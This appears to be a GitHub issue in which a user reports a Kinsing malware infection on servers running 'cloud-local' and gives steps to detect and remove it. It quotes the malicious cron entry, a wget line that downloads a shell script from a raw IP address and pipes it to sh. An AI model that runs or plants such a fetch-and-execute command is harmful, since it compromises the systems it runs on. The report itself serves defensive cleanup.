Malware injection kinsing #73
Description
recently, I have found the malware injection (kinsing) was infected in my servers using cloud-local. Still don't know exactly how it happens, however, we could do the following to remove it:
-
Detect its appearance:
sudo grep CRON /var/log/syslog -
Remove the injection via cron:
$ crontab -e
Remove the line: wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1 -
Set permission to not allow anyone write to the folder /var/tmp or /tmp (except for root or special users).
This is just needed action to remove it. The server is definitely compromised, therefore data will be impacted. If anyone knows more about it, please share.